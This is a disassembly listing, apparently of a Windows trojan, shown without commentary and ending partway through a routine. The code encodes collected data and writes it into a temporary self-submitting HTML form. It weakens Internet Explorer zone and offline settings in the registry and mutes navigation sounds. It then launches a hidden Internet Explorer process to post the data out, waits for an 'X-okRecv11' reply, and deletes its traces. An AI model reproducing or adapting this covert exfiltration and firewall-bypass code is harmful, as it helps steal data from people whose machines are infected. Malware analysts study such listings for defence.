call sub_407D20 ; GetTokenInformation
push [ebp+arg_0]
push dword ptr [edi]
call sub_4032E2
add esp, 8
push edi
call sub_407A68 ; LocalFree
push [ebp+var_4]
call sub_407984 ; CloseHandle
pop edi
leave
retn
sub_4033E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403459 proc near ; CODE XREF: sub_403D8E+2F4�p
; sub_40409C+3�p
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push edi
push 0
push 80h
push 4
push 0
push 0
push 0C0000000h
push [ebp+arg_0]
call sub_407A8C ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_403483
xor eax, eax
jmp short loc_4034AA
; ---------------------------------------------------------------------------
loc_403483: ; CODE XREF: sub_403459+24�j
push 2
push 0
push 0
push edi
call sub_407ABC ; SetFilePointer
push 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_407B40 ; WriteFile
push edi
call sub_407984 ; CloseHandle
xor eax, eax
inc eax
loc_4034AA: ; CODE XREF: sub_403459+28�j
pop edi
leave
retn
sub_403459 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034AD proc near ; CODE XREF: sub_403D8E+274�p
var_2F46 = word ptr -2F46h
var_2F43 = byte ptr -2F43h
var_1F44 = dword ptr -1F44h
var_1F40 = byte ptr -1F40h
var_1F3C = dword ptr -1F3Ch
var_1F38 = dword ptr -1F38h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2F48h
call sub_4078CC
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_2F43]
push eax
call sub_4078EC
push 1
push offset a? ; "?"
lea eax, [ebp+var_2F43]
push eax
call sub_401429
add esp, 0Ch
mov ebx, eax
mov [ebp+var_2F46], bx
movzx eax, [ebp+var_2F46]
cmp eax, 0FFFFh
jz short loc_40350B
movzx eax, [ebp+var_2F46]
mov [ebp+eax+var_2F43], 0
loc_40350B: ; CODE XREF: sub_4034AD+4D�j
mov [ebp+var_1F44], 1F40h
lea eax, [ebp+var_1F44]
push eax
lea eax, [ebp+var_1F40]
push eax
push offset a_ ; "*.*"
call sub_406E4C ; FindFirstUrlCacheEntryA
mov edi, eax
or eax, eax
jz short loc_4035AD
lea eax, [ebp+var_2F43]
push eax
push [ebp+var_1F3C]
call sub_407DD4
add esp, 8
or eax, eax
jnz short loc_40355D
push [ebp+var_1F38]
push esi
call sub_4078EC
xor eax, eax
inc eax
jmp short loc_4035AD
; ---------------------------------------------------------------------------
loc_40355D: ; CODE XREF: sub_4034AD+9D�j
; sub_4034AD:loc_4035A9�j
mov [ebp+var_1F44], 1F40h
lea eax, [ebp+var_1F44]
push eax
lea eax, [ebp+var_1F40]
push eax
push edi
call sub_406E58 ; FindNextUrlCacheEntryA
or eax, eax
jz short loc_4035AB
lea eax, [ebp+var_2F43]
push eax
push [ebp+var_1F3C]
call sub_407DD4
add esp, 8
or eax, eax
jnz short loc_4035A9
push [ebp+var_1F38]
push esi
call sub_4078EC
xor eax, eax
inc eax
jmp short loc_4035AD
; ---------------------------------------------------------------------------
loc_4035A9: ; CODE XREF: sub_4034AD+E9�j
jmp short loc_40355D
; ---------------------------------------------------------------------------
loc_4035AB: ; CODE XREF: sub_4034AD+D0�j
xor eax, eax
loc_4035AD: ; CODE XREF: sub_4034AD+84�j
; sub_4034AD+AE�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4034AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4035B2 proc near ; CODE XREF: sub_403659+36B�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
push ebx
call sub_407B4C ; lstrlenA
mov [ebp+var_8], eax
mov edi, eax
shl edi, 1
add edi, 8
push edi
push 40h
call sub_407A5C ; LocalAlloc
mov [ebp+var_C], eax
xor esi, esi
jmp short loc_4035F3
; ---------------------------------------------------------------------------
loc_4035DD: ; CODE XREF: sub_4035B2+44�j
movzx eax, byte ptr [ebx+esi]
xor eax, 71h
or eax, eax
jz short loc_4035F2
movzx eax, byte ptr [ebx+esi]
xor eax, 71h
mov [ebx+esi], al
loc_4035F2: ; CODE XREF: sub_4035B2+34�j
inc esi
loc_4035F3: ; CODE XREF: sub_4035B2+29�j
cmp esi, [ebp+var_8]
jb short loc_4035DD
mov [ebp+var_2], 0
jmp short loc_403648
; ---------------------------------------------------------------------------
loc_403600: ; CODE XREF: sub_4035B2+9D�j
movzx edi, [ebp+var_2]
movzx edi, byte ptr [ebx+edi]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov esi, edx
add esi, 61h
push esi
mov eax, edi
mov ecx, 1Ah
mov edx, 4EC4EC4Fh
mul edx
shr edx, 3
mov [ebp+var_10], edx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_C]
push edi
push offset aSCC ; "%s%c%c"
push edi
call sub_407E40
add esp, 14h
inc [ebp+var_2]
loc_403648: ; CODE XREF: sub_4035B2+4C�j
movzx eax, [ebp+var_2]
cmp eax, [ebp+var_8]
jb short loc_403600
mov eax, [ebp+var_C]
pop edi
pop esi
pop ebx
leave
retn
sub_4035B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403659 proc near ; CODE XREF: sub_403D8E+BE�p
var_30048 = dword ptr -30048h
var_30044 = dword ptr -30044h
var_30040 = dword ptr -30040h
var_3003C = dword ptr -3003Ch
var_30038 = dword ptr -30038h
var_30034 = dword ptr -30034h
var_3002C = byte ptr -3002Ch
var_30022 = byte ptr -30022h
var_30018 = dword ptr -30018h
var_30014 = dword ptr -30014h
var_30010 = dword ptr -30010h
var_3000C = dword ptr -3000Ch
var_30008 = byte ptr -30008h
var_20008 = dword ptr -20008h
var_20003 = byte ptr -20003h
var_10004 = dword ptr -10004h
var_10000 = byte ptr -10000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 30048h
call sub_4078CC
push ebx
push esi
push edi
and [ebp+var_30014], 0
and [ebp+var_20008], 0
and [ebp+var_30010], 0
lea eax, [ebp+var_10004]
push eax
push [ebp+arg_4]
call sub_4014E2
add esp, 8
mov esi, eax
mov eax, [ebp+var_10004]
or eax, eax
jz short loc_4036A5
or esi, esi
jz short loc_4036A5
cmp [ebp+arg_14], eax
jb short loc_4036B5
loc_4036A5: ; CODE XREF: sub_403659+41�j
; sub_403659+45�j
push esi
call sub_407A68 ; LocalFree
mov [ebp+var_30014], 1
loc_4036B5: ; CODE XREF: sub_403659+4A�j
push [ebp+arg_C]
call sub_407B4C ; lstrlenA
mov [ebp+var_30034], eax
mov eax, 64h
mul [ebp+var_10004]
mov [ebp+var_30038], eax
mov edi, [ebp+var_30034]
imul edi, [ebp+var_30034], 32h
mov edx, [ebp+var_30038]
lea edi, [edx+edi+1000h]
push edi
push 40h
call sub_407A5C ; LocalAlloc
mov ebx, eax
push [ebp+arg_0]
push 104h
call sub_4079A8 ; GetTempPathA
mov eax, [ebp+arg_0]
mov [ebp+var_3003C], eax
mov ecx, eax
or eax, 0FFFFFFFFh
loc_403713: ; CODE XREF: sub_403659+BF�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_403713
mov edi, eax
push 8
mov edx, [ebp+var_3003C]
add edx, edi
push edx
call sub_4013E4
add esp, 8
push offset a_htm ; ".htm"
push [ebp+arg_0]
call sub_407E64
add esp, 8
push offset aHtml ; "<html>"
push ebx
call sub_402F2F
add esp, 8
push offset aHead ; "<head>"
push ebx
call sub_402F2F
add esp, 8
push [ebp+arg_1C]
push offset aMicrosoftCorp ; "MicroSoft-Corp"
push offset aTitleSUTitle ; "<title>%s%u</title>"
lea eax, [ebp+var_20003]
push eax
call sub_407E40
add esp, 10h
lea eax, [ebp+var_20003]
push eax
push ebx
call sub_402F2F
add esp, 8
push offset aHead_0 ; "</head>"
push ebx
call sub_402F2F
add esp, 8
push offset aBody ; "<body>"
push ebx
call sub_402F2F
add esp, 8
call sub_407E28
mov ecx, 3E8h
cdq
idiv ecx
push edx
push offset aF_3u ; "f%.3u"
lea edi, [ebp+var_30022]
push edi
call sub_407E40
add esp, 0Ch
lea eax, [ebp+var_30022]
push eax
push [ebp+arg_8]
push offset aFormActionSMet ; "<form action=\"%s\" method=\"POST\" name=\"%"...
lea eax, [ebp+var_20003]
push eax
call sub_407E40
add esp, 10h
lea eax, [ebp+var_20003]
push eax
push ebx
call sub_402F2F
add esp, 8
call sub_407E28
mov ecx, 9
cdq
idiv ecx
mov edi, edx
add edi, 14h
push edi
push offset aInputTypeEditV ; "<input type=\"edit\" value='%u' name='a'>"...
lea edi, [ebp+var_20003]
push edi
call sub_407E40
add esp, 0Ch
lea eax, [ebp+var_20003]
push eax
push ebx
call sub_402F2F
add esp, 8
cmp [ebp+var_30014], 0
jnz loc_403A3A
cmp [ebp+arg_18], 0
jz loc_403937
and [ebp+var_30040], 0
jmp loc_40391A
; ---------------------------------------------------------------------------
loc_40384D: ; CODE XREF: sub_403659+2CD�j
mov [ebp+var_10000], 0
and [ebp+var_30044], 0
jmp short loc_4038CD
; ---------------------------------------------------------------------------
loc_40385D: ; CODE XREF: sub_403659+27E�j
mov eax, [ebp+var_30040]
add eax, [ebp+var_30044]
cmp eax, [ebp+var_10004]
jnb short loc_4038D9
mov edi, [ebp+var_30040]
add edi, [ebp+var_30044]
movzx edi, byte ptr [esi+edi]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
add edx, 61h
push edx
mov eax, edi
mov ecx, 1Ah
mov edx, 4EC4EC4Fh
mul edx
shr edx, 3
mov [ebp+var_30048], edx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp+var_10000]
push edi
push offset aSCC ; "%s%c%c"
lea edi, [ebp+var_10000]
push edi
call sub_407E40
add esp, 14h
inc [ebp+var_30044]
loc_4038CD: ; CODE XREF: sub_403659+202�j
cmp [ebp+var_30044], 80h
jb short loc_40385D
loc_4038D9: ; CODE XREF: sub_403659+216�j
push [ebp+var_20008]
push [ebp+arg_10]
lea eax, [ebp+var_10000]
push eax
push offset aInputTypeEdi_0 ; "<input type=\"edit\" value='%s' name='%s%"...
lea eax, [ebp+var_20003]
push eax
call sub_407E40
lea eax, [ebp+var_20003]
push eax
push ebx
call sub_402F2F
add esp, 1Ch
add [ebp+var_30040], 80h
inc [ebp+var_20008]
loc_40391A: ; CODE XREF: sub_403659+1EF�j
mov eax, [ebp+var_10004]
cmp [ebp+var_30040], eax
jb loc_40384D
mov [ebp+var_30010], eax
jmp loc_403A3A
; ---------------------------------------------------------------------------
loc_403937: ; CODE XREF: sub_403659+1E2�j
mov eax, [ebp+arg_14]
mov [ebp+var_10004], eax
jmp loc_403A16
; ---------------------------------------------------------------------------
loc_403945: ; CODE XREF: sub_403659+3DB�j
cmp [ebp+var_10000], 0
jz loc_403A16
mov eax, [ebp+arg_14]
add eax, 0C800h
cmp [ebp+var_10004], eax
jnb loc_403A3A
mov eax, [ebp+var_10004]
mov [ebp+var_30010], eax
push [ebp+arg_C]
push offset aS ; "%s|"
lea eax, [ebp+var_30008]
push eax
call sub_407E40
add esp, 0Ch
lea ecx, [ebp+var_30008]
or eax, 0FFFFFFFFh
loc_403992: ; CODE XREF: sub_403659+33E�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_403992
mov edi, eax
mov word ptr [ebp+var_30040+2], di
lea eax, [ebp+var_10000]
push eax
movzx eax, word ptr [ebp+var_30040+2]
lea eax, [ebp+eax+var_30008]
push eax
call sub_4078EC
lea eax, [ebp+var_30008]
push eax
call sub_4035B2
add esp, 4
mov [ebp+var_3000C], eax
push [ebp+var_20008]
push [ebp+arg_10]
push [ebp+var_3000C]
push offset aInputTypeEdi_0 ; "<input type=\"edit\" value='%s' name='%s%"...
lea eax, [ebp+var_20003]
push eax
call sub_407E40
add esp, 14h
lea eax, [ebp+var_20003]
push eax
push ebx
call sub_402F2F
add esp, 8
push [ebp+var_3000C]
call sub_407A68 ; LocalFree
inc [ebp+var_20008]
loc_403A16: ; CODE XREF: sub_403659+2E7�j
; sub_403659+2F3�j
lea eax, [ebp+var_10000]
push eax
push [ebp+var_10004]
push esi
call sub_401560
add esp, 0Ch
mov [ebp+var_10004], eax
or eax, eax
jnz loc_403945
loc_403A3A: ; CODE XREF: sub_403659+1D8�j
; sub_403659+2D9�j ...
push offset aInputTypeSubmi ; "<input type=\"submit\" value=''>"
push ebx
call sub_402F2F
push offset aForm ; "</form>"
push ebx
call sub_402F2F
push offset aScript ; "<script>"
push ebx
call sub_402D21
call sub_407E28
mov [ebp+var_30040], eax
call sub_407E28
mov ecx, 63h
cdq
idiv ecx
push edx
mov edi, [ebp+var_30040]
mov eax, edi
mov ecx, 14h
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
push offset aC_2u ; "%c%.2u"
lea edi, [ebp+var_3002C]
push edi
call sub_407E40
lea eax, [ebp+var_3002C]
push eax
push offset aFunctionS ; "function %s(){"
lea eax, [ebp+var_20003]
push eax
call sub_407E40
lea eax, [ebp+var_20003]
push eax
push ebx
call sub_402D21
lea eax, [ebp+var_30022]
push eax
push offset aDocument_S_sub ; "document.%s.submit();"
lea eax, [ebp+var_20003]
push eax
call sub_407E40
lea eax, [ebp+var_20003]
push eax
push ebx
call sub_402D21
push offset asc_424B31 ; "}"
push ebx
call sub_402D21
call sub_407E28
mov ecx, 3E8h
cdq
idiv ecx
mov edi, edx
add edi, 2710h
push edi
lea edi, [ebp+var_3002C]
push edi
push offset aSettimeoutSU ; "setTimeout(\"%s()\",%u);"
lea edi, [ebp+var_20003]
push edi
call sub_407E40
lea eax, [ebp+var_20003]
push eax
push ebx
call sub_402D21
push offset aScript_0 ; "</script>"
push ebx
call sub_402F2F
push offset aBody_0 ; "</body>"
push ebx
call sub_402F2F
push offset aHtml_0 ; "</html>"
push ebx
call sub_407E64
push [ebp+arg_0]
call sub_4024E0
add esp, 8Ch
push 0
push 0
push 2
push 0
push 0
push 40000000h
push [ebp+arg_0]
call sub_407A8C ; CreateFileA
mov [ebp+var_30018], eax
push ebx
call sub_407B4C ; lstrlenA
push 0
lea edi, [ebp+var_20008]
push edi
push eax
push ebx
push [ebp+var_30018]
call sub_407B40 ; WriteFile
push [ebp+var_30018]
call sub_407984 ; CloseHandle
push ebx
call sub_407A68 ; LocalFree
cmp [ebp+var_30014], 0
jnz short loc_403BB5
push esi
call sub_407A68 ; LocalFree
jmp short loc_403BBA
; ---------------------------------------------------------------------------
loc_403BB5: ; CODE XREF: sub_403659+552�j
or eax, 0FFFFFFFFh
jmp short loc_403BC0
; ---------------------------------------------------------------------------
loc_403BBA: ; CODE XREF: sub_403659+55A�j
mov eax, [ebp+var_30010]
loc_403BC0: ; CODE XREF: sub_403659+55F�j
pop edi
pop esi
pop ebx
leave
retn
sub_403659 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BC5 proc near ; CODE XREF: sub_403D8E:loc_403E12�p
var_210A = byte ptr -210Ah
var_110C = byte ptr -110Ch
var_110B = byte ptr -110Bh
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_101 = byte ptr -101h
var_100 = byte ptr -100h
push ebp
mov ebp, esp
mov eax, 210Ch
call sub_4078CC
and [ebp+var_108], 0
mov [ebp+var_101], 0
jmp loc_403CA5
; ---------------------------------------------------------------------------
loc_403BE5: ; CODE XREF: sub_403BC5+E8�j
movzx eax, [ebp+var_101]
push eax
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
lea eax, [ebp+var_100]
push eax
call sub_407E40
push 4
push 4
lea eax, [ebp+var_108]
push eax
push offset a1601 ; "1601"
lea eax, [ebp+var_100]
push eax
push 80000001h
call sub_401379
push 4
push 4
lea eax, [ebp+var_108]
push eax
push offset a1601 ; "1601"
lea eax, [ebp+var_100]
push eax
push 80000002h
call sub_401379
movzx eax, [ebp+var_101]
push eax
push offset aSoftwarePolici ; "SOFTWARE\\Policies\\Microsoft\\Windows\\Cur"...
lea eax, [ebp+var_100]
push eax
call sub_407E40
push 4
push 4
lea eax, [ebp+var_108]
push eax
push offset a1601 ; "1601"
lea eax, [ebp+var_100]
push eax
push 80000002h
call sub_401379
push 4
push 4
lea eax, [ebp+var_108]
push eax
push offset a1601 ; "1601"
lea eax, [ebp+var_100]
push eax
push 80000001h
call sub_401379
add esp, 78h
add [ebp+var_101], 1
loc_403CA5: ; CODE XREF: sub_403BC5+1B�j
mov al, [ebp+var_101]
cmp al, 5
jb loc_403BE5
call sub_4079C0 ; GetVersion
cmp eax, 80000000h
jb short loc_403CE1
push 1
push 4
push offset aYes ; "yes"
push offset aBrowsenewproce ; "BrowseNewProcess"
push offset a_defaultSoftwa ; ".DEFAULT\\SOFTWARE\\Microsoft\\Windows\\Cur"...
push 80000003h
call sub_401379
add esp, 18h
jmp short loc_403D30
; ---------------------------------------------------------------------------
loc_403CE1: ; CODE XREF: sub_403BC5+F8�j
lea eax, [ebp+var_110B]
push eax
call sub_4033E8
lea eax, [ebp+var_110B]
push eax
push offset aSSoftwareMicro ; "%s\\Software\\Microsoft\\Internet Explorer"...
lea eax, [ebp+var_210A]
push eax
call sub_407E40
and [ebp+var_10C], 0
push 4
push 4
lea eax, [ebp+var_10C]
push eax
push offset aIexplore_exe ; "iexplore.exe"
lea eax, [ebp+var_210A]
push eax
push 80000003h
call sub_401379
add esp, 28h
loc_403D30: ; CODE XREF: sub_403BC5+11A�j
push 4
push 4
lea eax, [ebp+var_108]
push eax
push offset aGlobaluseroffl ; "GlobalUserOffline"
push offset aSoftwareMicr_1 ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push 80000001h
call sub_401379
push 1
push 0
push offset byte_424E15
push offset byte_424E15
push offset aAppeventsSchem ; "AppEvents\\Schemes\\Apps\\Explorer\\Navigat"...
push 80000001h
call sub_401379
push 1
push 0
push offset byte_424E15
push offset byte_424E15
push offset aAppeventsSch_0 ; "AppEvents\\Schemes\\Apps\\Explorer\\Activat"...
push 80000001h
call sub_401379
add esp, 48h
leave
retn
sub_403BC5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403D8E proc near ; CODE XREF: sub_405AAC+131�p
; sub_405AAC+326�p ...
var_380 = dword ptr -380h
var_379 = byte ptr -379h
var_275 = byte ptr -275h
var_274 = byte ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = byte ptr -260h
var_25C = dword ptr -25Ch
var_250 = byte ptr -250h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_11C = dword ptr -11Ch
var_118 = word ptr -118h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 380h
push esi
push edi
mov esi, [ebp+arg_0]
and [ebp+var_14C], 0
xor edi, edi
push offset dword_420008
call sub_407A2C ; InterlockedIncrement
mov [ebp+var_264], eax
push 10h
push 0
lea eax, [ebp+var_260]
push eax
call sub_407E10
mov [ebp+var_268], 104h
lea eax, [ebp+var_274]
push eax
lea eax, [ebp+var_268]
push eax
lea eax, [ebp+var_250]
push eax
push offset aPath ; "Path"
push offset aSoftwareMicr_2 ; "Software\\Microsoft\\IE Setup\\Setup"
push 80000002h
call sub_401326
add esp, 24h
mov [ebp+var_26C], eax
or eax, eax
jnz short loc_403E12
push esi
call sub_407A68 ; LocalFree
xor eax, eax
jmp loc_404113
; ---------------------------------------------------------------------------
loc_403E12: ; CODE XREF: sub_403D8E+75�j
call sub_403BC5
push 104h
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_250]
push eax
call sub_407924 ; ExpandEnvironmentStringsA
push [ebp+var_264]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push esi
lea eax, [ebp+var_250]
push eax
call sub_403659
add esp, 20h
mov [ebp+var_14C], eax
cmp [ebp+arg_1C], 0
jz short loc_403E78
cmp eax, 0FFFFFFFFh
jz short loc_403E72
mov eax, [ebp+arg_1C]
mov edx, [ebp+var_14C]
mov [eax], edx
jmp short loc_403E78
; ---------------------------------------------------------------------------
loc_403E72: ; CODE XREF: sub_403D8E+D5�j
mov eax, [ebp+arg_1C]
and dword ptr [eax], 0
loc_403E78: ; CODE XREF: sub_403D8E+D0�j
; sub_403D8E+E2�j
cmp [ebp+var_14C], 0
jnz short loc_403E8E
push esi
call sub_407A68 ; LocalFree
xor eax, eax
jmp loc_404113
; ---------------------------------------------------------------------------
loc_403E8E: ; CODE XREF: sub_403D8E+F1�j
push offset aIexplore_exe_0 ; "\\Iexplore.exe "
lea eax, [ebp+var_104]
push eax
call sub_407E64
lea eax, [ebp+var_250]
push eax
lea eax, [ebp+var_104]
push eax
call sub_407E64
call sub_402CB2
mov [ebp+var_270], eax
push 44h
push 0
lea eax, [ebp+var_148]
push eax
call sub_407E10
push 44h
push 0
lea eax, [ebp+var_148]
push eax
call sub_407E10
add esp, 28h
mov [ebp+var_148], 44h
mov [ebp+var_11C], 1
mov [ebp+var_118], 1
cmp [ebp+var_270], 0
jz short loc_403F15
lea eax, [ebp+var_148]
push eax
call sub_402D13
pop ecx
jmp short loc_403F1E
; ---------------------------------------------------------------------------
loc_403F15: ; CODE XREF: sub_403D8E+176�j
mov [ebp+var_118], 0
loc_403F1E: ; CODE XREF: sub_403D8E+185�j
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_148]
push eax
push 0
push 0
push 20h
push 0
push 0
push 0
lea eax, [ebp+var_104]
push eax
push 0
call sub_407B1C ; CreateProcessA
or eax, eax
jz loc_4040DC
push [ebp+var_25C]
call sub_407984 ; CloseHandle
push [ebp+var_264]
push offset aMicrosoftCorp ; "MicroSoft-Corp"
push offset aSUMicrosoftInt ; "%s%u - Microsoft Internet Explorer"
lea eax, [ebp+var_104]
push eax
call sub_407E40
add esp, 10h
mov [ebp+var_275], 0
jmp short loc_403FA9
; ---------------------------------------------------------------------------
loc_403F81: ; CODE XREF: sub_403D8E+223�j
lea eax, [ebp+var_104]
push eax
push offset aIeframe ; "IEFrame"
call sub_407B94 ; FindWindowA
mov edi, eax
or edi, edi
jnz short loc_403FB3
push 3E8h
call sub_407AE0 ; Sleep
add [ebp+var_275], 1
loc_403FA9: ; CODE XREF: sub_403D8E+1F1�j
mov al, [ebp+var_275]
cmp al, 0Ah
jb short loc_403F81
loc_403FB3: ; CODE XREF: sub_403D8E+208�j
or edi, edi
jz loc_4040D3
push 0F000h
call sub_407AE0 ; Sleep
push 104h
lea eax, [ebp+var_104]
push eax
push edi
call sub_407B7C ; GetWindowTextA
push 1
push offset aXOkrecv11 ; "X-okRecv11"
lea eax, [ebp+var_104]
push eax
call sub_401429
add esp, 0Ch
cmp eax, 0FFFFh
jz loc_4040CA
lea eax, [ebp+var_379]
push eax
push [ebp+arg_4]
call sub_4034AD
add esp, 8
or eax, eax
jz loc_4040BE ; DATA XREF: .data:0041CF71�w
; .data:0041CF8B�w ...
push 0
loc_404014: ; DATA XREF: .data:0041D05A�w
push [ebp+arg_8]
lea eax, [ebp+var_379]
push eax
call sub_407A20 ; DATA XREF: .data:0041D054�r
lea eax, [ebp+var_14C] ; DATA XREF: .data:0041D04E�r
; .data:0041D048�r
push eax
push [ebp+arg_8] ; DATA XREF: .data:loc_41CFD9�r
; .data:loc_41CFE9�r
call sub_4014E2 ; DATA XREF: .data:0041CEDD�w
mov [ebp+var_380], eax ; DATA XREF: .data:0041CEE7�w
; .data:0041CF02�r ...
loc_404038: ; DATA XREF: .data:0041CEEF�w
push [ebp+arg_8]
call sub_407B70 ; DATA XREF: .data:0041CEFC�o
; .data:0041CF0A�o
push offset aHtml_1 ; "<HTML><!--"
call sub_407B4C ; lstrlenA
push eax
push offset aHtml_1 ; "<HTML><!--"
push [ebp+var_380]
call sub_407E7C
add esp, 14h
or eax, eax
jnz short loc_40408C
push offset aHtml_1 ; "<HTML><!--"
call sub_407B4C ; lstrlenA
mov edi, [ebp+var_14C]
sub edi, 3Ah
push edi
mov edi, eax
add edi, [ebp+var_380]
push edi
push [ebp+arg_8]
call sub_403459
add esp, 0Ch
jmp short loc_4040A7
; ---------------------------------------------------------------------------
loc_40408C: ; CODE XREF: sub_403D8E+2D2�j
; DATA XREF: .data:0041CE8C�w ...
mov eax, [ebp+var_14C]
sub eax, 40h ; DATA XREF: .data:0041D3EC�w
; .data:0041D3F2�r ...
push eax
push [ebp+var_380] ; DATA XREF: .data:0041E1D5�r
sub_403D8E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40409C proc near ; DATA XREF: .data:0041D316�o
push dword ptr [ebp+10h]
call sub_403459
add esp, 0Ch
loc_4040A7: ; CODE XREF: sub_403D8E+2FC�j
; DATA XREF: sub_41D468+C�o
push dword ptr [ebp-380h]
call sub_407A68 ; LocalFree
mov dword ptr [ebp-14Ch], 2 ; DATA XREF: sub_41D468+1C�o
jmp short loc_4040E3
; ---------------------------------------------------------------------------
loc_4040BE: ; CODE XREF: sub_403D8E+27E�j
mov dword ptr [ebp-14Ch], 1
jmp short loc_4040E3
; ---------------------------------------------------------------------------
loc_4040CA: ; CODE XREF: sub_403D8E+264�j
and dword ptr [ebp-14Ch], 0
jmp short loc_4040E3
; ---------------------------------------------------------------------------
loc_4040D3: ; CODE XREF: sub_403D8E+227�j
and dword ptr [ebp-14Ch], 0
jmp short loc_4040E3
; ---------------------------------------------------------------------------
loc_4040DC: ; CODE XREF: sub_403D8E+1BA�j
and dword ptr [ebp-14Ch], 0
loc_4040E3: ; CODE XREF: sub_40409C+20�j
; sub_40409C+2C�j ...
lea eax, [ebp-250h]
push eax
call sub_407B70 ; DeleteFileA
push esi
call sub_407A68 ; LocalFree
push 0
push dword ptr [ebp-260h]
call sub_407AEC ; TerminateProcess
push dword ptr [ebp-260h]
call sub_407984 ; CloseHandle
mov eax, [ebp-14Ch]
loc_404113: ; CODE XREF: sub_403D8E+7F�j
; sub_403D8E+FB�j
pop edi
pop esi
leave
retn
sub_40409C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404117 proc near ; CODE XREF: sub_4043B0+D5�p
; sub_404878-18D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, [ebp+arg_4]
push ebx
call sub_407B58 ; lstrlenW
mov edi, eax
push 0
push 0
push 1FFFh
push esi
push edi
push ebx
push 0
push 0
call sub_407B28 ; WideCharToMultiByte
mov byte ptr [esi+edi], 0
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_404117 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40414B proc near ; CODE XREF: sub_404184+80�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push edi
mov edi, [ebp+arg_0]
cmp dword_420010, 0
jz short loc_404167
mov eax, dword_420010
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_404167: ; CODE XREF: sub_40414B+F�j
mov eax, [edi+4]
push dword ptr [edi+4]
mov ebx, [eax]
call dword ptr [ebx+8]
mov eax, [edi]
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+8]
call sub_406E88
pop edi
pop ebx
pop ebp
retn
sub_40414B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404184 proc near ; CODE XREF: sub_4043B0+37�p
var_10 = byte ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
and dword ptr [edi], 0
and dword ptr [edi+4], 0
push 0
call sub_406E7C
lea eax, [ebp+var_10]
push eax
push offset a9ba05972F6a811 ; "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"
call sub_406E70
mov esi, eax
xor ebx, ebx
cmp esi, ebx
setl bl
or ebx, ebx
jnz short loc_404203
push edi
push offset dword_4253E8
push 4
push 0
lea eax, [ebp+var_10]
push eax
call sub_406E64
mov esi, eax
xor ebx, ebx
cmp esi, ebx
setl bl
or ebx, ebx
jnz short loc_404203
mov eax, edi
add eax, 4
push eax
push offset dword_4253D8
mov eax, [edi]
push dword ptr [edi]
mov ebx, [eax]
call dword ptr ds:0[ebx]
mov esi, eax
xor ebx, ebx
cmp esi, ebx
setl bl
or ebx, ebx
jnz short loc_404203
xor eax, eax
inc eax
jmp short loc_40420C
; ---------------------------------------------------------------------------
loc_404203: ; CODE XREF: sub_404184+33�j
; sub_404184+53�j ...
push edi
call sub_40414B
pop ecx
xor eax, eax
loc_40420C: ; CODE XREF: sub_404184+7D�j
pop edi
pop esi
pop ebx
leave
retn
sub_404184 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404211 proc near ; CODE XREF: sub_4043B0+5F�p
var_10020 = byte ptr -10020h
